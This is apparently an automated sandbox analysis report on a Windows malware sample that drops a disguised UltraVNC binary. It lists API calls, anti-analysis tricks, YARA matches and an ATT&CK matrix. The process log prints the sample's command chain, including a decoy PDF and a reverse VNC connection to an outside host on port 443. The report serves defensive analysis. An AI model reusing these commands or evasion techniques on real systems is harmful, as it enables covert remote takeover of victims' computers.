Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		25_2_00007FF67E7C9D00

Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Windows\Tasks\sync_browser.exe	Window / User API: threadDelayed 1348
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 359
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 368
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 369

Source: C:\Windows\Tasks\sync_browser.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_22-23860

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 3.3 %
Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 1.1 %

Source: C:\Windows\Tasks\sync_browser.exe TID: 4844	Thread sleep time: -134800s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 2984	Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8080	Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2320	Thread sleep count: 359 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2320	Thread sleep time: -35900s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3756	Thread sleep count: 368 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 3756	Thread sleep time: -36800s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 652	Thread sleep count: 369 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 652	Thread sleep time: -36900s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6064	Thread sleep count: 294 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Tasks\sync_browser.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	22_2_00007FF67E7C5910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	22_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	22_2_00007FF67E7EC210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	22_2_00007FF67E87A228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	25_2_00007FF67E7C5910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	25_2_00007FF67E7E6DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	25_2_00007FF67E7EC210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E87A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	25_2_00007FF67E87A228

Source: C:\Windows\Tasks\sync_browser.exe

22_2_00007FF67E7E6DD1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7C6060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,

22_2_00007FF67E7C6060

Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: sync_browser.exe, 00000019.00000002.1537006300.000000000112B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: sync_browser.exe, 00000016.00000002.3193034089.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sync_browser.exe, 00000019.00000002.1537201340.0000000002D55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Tasks\sync_browser.exe

API call chain: ExitProcess graph end node

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

22_2_00007FF67E8847E4

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7D26B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,

22_2_00007FF67E7D26B0

Source: C:\Windows\Tasks\sync_browser.exe

22_2_00007FF67E829BC0

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00007FF67E8847E4
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E877220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_00007FF67E877220
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E8847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00007FF67E8847E4
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E877220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_00007FF67E877220

Source: C:\Windows\Tasks\sync_browser.exe

Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe

25_2_00007FF67E829BC0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7D37E0 GetVersionExA,GetEnvironmentVariableA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,SetFileAttributesA,GetEnvironmentVariableA,GetForegroundWindow,ShellExecuteExA,

22_2_00007FF67E7D37E0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,

22_2_00007FF67E7D74C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7E4D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,

22_2_00007FF67E7E4D7E

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd	Jump to behavior
Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7D7B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,

22_2_00007FF67E7D7B90

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0040244E

Source: WPSela.LSZr7V.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr	Binary or memory string: Program Manager
Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr	Binary or memory string: Shell_TrayWnd
Source: sync_browser.exe, sync_browser.exe, 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr	Binary or memory string: Progman
Source: 7q551ugrWe.exe, 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00402187

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401815

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E829EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,

22_2_00007FF67E829EF0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E87DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

22_2_00007FF67E87DF80

Source: C:\Users\user\Desktop\7q551ugrWe.exe

Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405721

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 22.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7q551ugrWe.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 2624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED

Remote Access Functionality

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 22.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.sync_browser.exe.7ff67e7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349581148.000000000295B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349858008.000000000098B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1349581148.0000000002790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7q551ugrWe.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 2624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: sync_browser.exe, 00000016.00000002.3193216128.0000000000A60000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Access Token Manipulation	1 Timestomp	NTDS	4 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	1 Bootkit	11 Windows Service	1 DLL Side-Loading	LSA Secrets	26 System Information Discovery	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	231 Masquerading	Cached Domain Credentials	41 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Valid Accounts	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
